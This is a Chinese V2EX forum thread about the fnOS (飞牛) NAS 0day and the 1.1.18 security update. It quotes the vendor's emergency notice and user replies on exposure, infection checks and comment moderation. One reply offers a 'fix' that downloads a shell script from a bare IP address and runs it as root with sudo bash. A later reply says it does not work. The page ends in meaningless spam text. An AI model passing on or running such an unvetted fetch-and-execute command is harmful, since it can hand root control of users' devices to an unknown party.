飞牛今天凌晨发布 1.1.18 更新,然后我发现论坛发评论开始审核,昨晚还正常评论 - V2EX
kingpo

飞牛今天凌晨发布 1.1.18 更新,然后我发现论坛发评论开始审核,昨晚还正常评论

  •  
  •   kingpo Feb 1 3700 views
    This topic created in 106 days ago, the information mentioned may be changed or developed.

    飞牛用户,检查了自己设备,目前没中招,昨晚 0day 漏洞网上很沸腾,我翻遍论坛,没找到官方正式的回复和公告。

    社区很多评论在骂的,说这么严重的漏洞应该发布公告。

    昨晚发评论互动还能正常发布。今晚想回复个信息,发现都要审核了,无法及时发布。他们好像意识到问题的严重性,好像也没意识面对这个问题造成影响态度的问题。

    今天上午发现已经发布更新 1.1.18 。不过我设备升级几次,均无法升级,一直在下载更新,几个小时没反应。

    论坛发现发布了一个紧急公告:

    近日,飞牛技术团队在安全巡检与用户反馈分析过程中,发现部分设备在公网环境下,存在异常访问风险。受影响设备在提供网络服务的过程中,可能因外部异常流量导致系统及部分应用稳定性受到影响。

    针对该异常行为,此前我们已于第一时间推送了 1.1.15 版本安全更新,并向全体用户发出了升级通知,阻断异常行为。

    经深入分析,此次攻击行为具有明显针对 fnOS 的定向属性,且采用了多维度复合型攻击手法。过去一周,技术团队已紧急排查大量异常设备,持续追踪木马样本及其变种并展开深度分析。目前,安全团队已完成对该攻击链路的逆向工程,并发布系统安全更新以阻断此类攻击行为。

    请您尽快升级至 1.1.18 最新版本,补丁安装完成后无需额外配置,即可有效提升设备安全性及系统稳定性。

    我们对本次事件可能造成的不便深表歉意。在追查木马过程中,我们发现了自身代码的一些疏漏。未来,飞牛将持续加大安全投入,定期开展安全**与系统优化,直面大小漏洞,让系统更加健壮。同时,建议在 NAS 设备开放公网访问权限时,优先采用安全访问方式(加密隧道/2FA 验证/开启防火墙等),以进一步降低潜在安全风险。

    与此同时,为更好地保障用户安全,飞牛将成立安全快速响应团队,第一时间处理用户反馈的漏洞,筑牢产品安全防线。欢迎广大用户通过官方渠道积极提交安全问题与建议,对于首次有效反馈的漏洞,将提供相应激励。

    安全漏洞反馈入口:

    https://trim-nas.feishu.cn/share/base/form/shrcnYhRB4ryb9K8Te9GEqeRYYe

    安全问题联系邮箱:

    [email protected]

    感谢每一位用户的理解、耐心与监督。

    广州铁刃智造技术有限公司

    2026 年 2 月 1 日

    18 replies    2026-02-03 11:57:28 +08:00
    LnTrx
        1
    LnTrx  
       Feb 1
    nginx 访问日志 /usr/trim/nginx/logs/access.log 有检查过么
    jakes
        2
    jakes  
       Feb 2
    我升级了两次才成功,fnOS 只要前端报错操作就会卡住(推测是没有很好处理 JS 的异常)。

    刚删除存储空间也是,删除后卡死,刷新后发现存储空间已经被卸载,但是没有删除;再次点删除,又卡死,刷新后发现删除成功了。
    ritziiiiii
        3
    ritziiiiii  
       Feb 2 via Android
    如果不开 Fn Connect ,只开 ipv6 公网 和 ssh ,
    而且也把后缀 5666 ,5667 改了,ssh 的 22 也改了,这样还会出现问题吗?
    还有要不要进 PE 扫硬盘上的毒啊?
    abc8678
        4
    abc8678  
       Feb 2 via Android
    之前发帖也要审核啊
    testboy
        5
    testboy  
       Feb 2
    @ritziiiiii 风险会小一点,主要就看有没有被扫描到端口。
    alfawei
        6
    alfawei  
       Feb 2
    @abc8678 好像很多帖子被限制查看 有权限要求了
    killua67
        7
    killua67  
       Feb 2
    想知道怎么判断有没有中招?
    zhangchongjie
        8
    zhangchongjie  
       Feb 2 via Android
    @ritziiiiii 没事开什么 ssh ,又不是服务器,要盯。手机 app 监测够用可
    glamour
        9
    glamour  
       Feb 2
    @killua67 升级 1.18 如果卡死就是中招,系统升级被劫持;
    -------------------------修复办法---
    sudo curl -s http://47.100.24.236:50000/fix-dns-and-update.sh -o /tmp/fix-dns-and-update.sh && sudo bash /tmp/fix-dns-and-update.sh && sudo rm /tmp/fix-dns-and-update.sh
    群内脚本 实测更新成功
    Kirkcong
        10
    Kirkcong  
       Feb 2
    @ritziiiiii 会,fofa 可以搜索到你的机器,无视你修改后的端口,这个漏洞不依赖 ssh.
    Kirkcong
        11
    Kirkcong  
       Feb 2
    @glamour 没什么用,重启后恶意软件又回来了
    v00O
        12
    v00O  
       Feb 2
    用得 tailscale 组网,还好没用飞牛的公网访问,不然也得凉凉
    shidianxia
        13
    shidianxia  
       Feb 2
    昨晚 cpu 风扇一直响,看进程也找不到哪个在占用,索性关机了。想知道怎么判断有没有中招?+1
    kingpo
        14
    kingpo  
    OP
       Feb 2 via Android
    @ritziiiiii 应该不会,我一开始就是你这样的操作,默认端口都改了,只 v6 公网,v4 是 stun 穿透
    kingpo
        15
    kingpo  
    OP
       Feb 2 via Android
    @LnTrx 这个没
    kingpo
        16
    kingpo  
    OP
       Feb 2 via Android
    @abc8678 我前晚发都不用审核
    unusualcat
        17
    unusualcat  
       Feb 2
    删贴控评,这是为你们好,怕你们乱说乱叫引起其他用户恐慌~
    xixka
        18
    xixka  
       Feb 3
    教科书常见的公关手段,你卖的东西让人拉肚子了。为了赚钱必须让拉肚子的人不告诉新来的
    About     Help     Advertise     Blog     API     FAQ     Solana     3273 Online   Highest 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 98ms UTC 11:28 PVG 19:28 LAX 04:28 JFK 07:28
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86